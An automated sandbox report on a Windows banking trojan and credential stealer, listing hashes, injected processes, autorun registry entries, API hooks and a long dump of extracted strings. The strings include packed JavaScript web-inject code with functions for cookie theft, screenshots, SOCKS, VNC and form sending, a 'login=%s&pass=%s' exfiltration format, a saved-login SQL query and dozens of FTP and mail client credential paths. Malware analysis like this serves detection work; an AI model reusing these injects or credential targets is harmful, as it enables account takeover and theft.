Gen.Variant.Kazy.542007_53b5727579
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.542007 (B) (Emsisoft), Gen:Variant.Kazy.542007 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: 53b5727579ffab30d5bbde93bd1ca9be
SHA1: 681576423a90d03fe1990c8128bb370b05862587
SHA256: fe96009688f9fe983594fbfada272f77e25be44e8ee20d2204cb7addfce5021e
SSDeep: 6144:PdobwptJnkgwGSCEun5O1ohhyTlD3XkUYpYBpXcOfiz3yrQT4WNR4OcfByu/2 0a:9HJ9Lft5ZhhSlzXX5BpXcFiWNRUByu/z
Size: 389120 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1996-06-09 06:23:04
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:3320
%original file name%.exe:2448
The Trojan injects its code into the following process(es):
spoolsv.exe:1244
Explorer.EXE:1440
SearchIndexer.exe:1472
conhost.exe:1656
TPAutoConnSvc.exe:1676
OSPPSVC.EXE:1948
TPAutoConnect.exe:2160
conhost.exe:2168
wmiprvse.exe:3716
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:3320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\LibxaJximb\QamzEsom.ijv (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~004D627B.tmp (286 bytes)
The process %original file name%.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~004D627B.tmp (286 bytes)
Registry activity
The process regsvr32.exe:3320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"LibxaJximb" = "regsvr32.exe C:\ProgramData\LibxaJximb\QamzEsom.ijv"
The process %original file name%.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\{0AE625D1-61C9-42E5-AEF4-7154387F4248}]
"cdedlbemdbndljgh" = "0A BF 36 BA 20 0A CE 30 AD 81 07 E0 58 5F 05 7E"
Dropped PE files
MD5 | File path |
---|---|
9b412e889ac063ca40ad3b9e1afc2522 | c:\ProgramData\LibxaJximb\QamzEsom.ijv |
9b412e889ac063ca40ad3b9e1afc2522 | c:\Users\All Users\LibxaJximb\QamzEsom.ijv |
9b412e889ac063ca40ad3b9e1afc2522 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\~004D627B.tmp |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CreateProcessAsUserA
CreateProcessAsUserW
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateProcessA
CreateProcessW
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 5.131.3790.0
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: MSSIGN32.DLL
Internal Name: MSSIGN32.DLL
File Version: 5.131.3790.0 (srv03_rtm.030324-2048)
File Description: Microsoft Trust Signing APIs
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 242550 | 245760 | 5.50054 | d7042fdea8d2ef1d042be7cfc5d22c1a |
.rdata | 249856 | 24278 | 24576 | 3.5629 | 0d01c2ec3f0f21fa0d710f388a4891b4 |
.data | 274432 | 122496 | 110592 | 5.35066 | ca7f1c39fdf3cb72238398115f2fd6e8 |
.rsrc | 397312 | 3112 | 4096 | 2.40166 | f3dc09287d34ca712be0b2d7f096b182 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
Explorer.EXE_1440_rwx_047C0000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s 